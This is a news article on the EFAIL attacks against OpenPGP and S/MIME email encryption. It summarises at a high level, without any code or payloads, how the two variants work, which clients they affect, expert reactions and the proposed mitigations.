Emails Encrypted With OpenPGP, S/MIME Vulnerable to New Attacks
Researchers from three universities in Germany and Belgium say they have discovered attack methods that can be used by malicious actors to read emails encrypted with OpenPGP and S/MIME, but some believe the claims are overblown. The team of researchers who discovered the attacks were initially planning on disclosing details on Tuesday morning, but they later decided to make their findings public sooner as a result of speculation and third parties leaking information. OpenPGP is an encryption standard that is often used by individuals and organizations to protect emails and other types of communications against eavesdropping.
S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard that is more commonly used to secure email in enterprise environments. According to researchers, there are some vulnerabilities in OpenPGP and S/MIME that can be exploited to exfiltrate plain text from encrypted emails, including messages sent by the targeted user in the past. There are two variations of this attack, which experts have dubbed EFAIL.
Both require the attacker to be able to intercept encrypted emails, either via man-in-the-middle (MitM) attacks, by hacking email accounts, or through compromised SMTP servers. The attacker then manipulates the ciphertext in the harvested emails and sends a modified message containing custom HTML code to the original receiver or sender. The first method, which involves direct exfiltration, leverages vulnerabilities in the Apple Mail (for iOS and macOS) and Mozilla Thunderbird email clients.
In this attack, the hacker sends the targeted user a specially crafted multipart email with three HTML body parts. When the victim's client opens and decrypts the email, the attacker's code causes the application to send the text to the attacker's server. The second method, named a CBC/CFB gadget attack, abuses vulnerabilities in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689) specifications.
In both cases the victim needs to be in possession of their private key - the method cannot be used to recover encrypted messages if the private key has been lost. "Once [the victim] opens the email in his client, the manipulated ciphertext will be decrypted - first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker," researchers wrote in their paper on EFAIL.
Experts say the direct exfiltration technique is efficient against both PGP and S/MIME, while the second method works against PGP with a success rate of one in three attempts. On the other hand, the CBC/CFB gadget attacks could become more efficient against PGP as well once more research is conducted. The EFAIL attack is said to work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.
Just as the researchers announced their intention to disclose the details of these vulnerabilities, the EFF published a blog post telling users to "immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email" and use alternatives, such as Signal, for secure communications. However, some members of the industry believe the EFF's alert and the researchers' claims are overblown, noting that EFAIL attacks are actually possible due to how email clients implement PGP and they can be mitigated by not using HTML for incoming emails. Cryptography expert Matthew Green believes EFAIL poses a bigger risk to enterprises that use S/MIME, describing the attack on this standard as "straightforward."
Medium-term mitigations proposed by the researchers who discovered EFAIL involve patches released by email client developers, but they believe the mitigations implemented by each vendor "may or may not prevent the attacks." As for long-term mitigations, they believe changes will need to be made to the OpenPGP and S/MIME standards themselves. Related: PGP Email Encryption Fundamentally Broken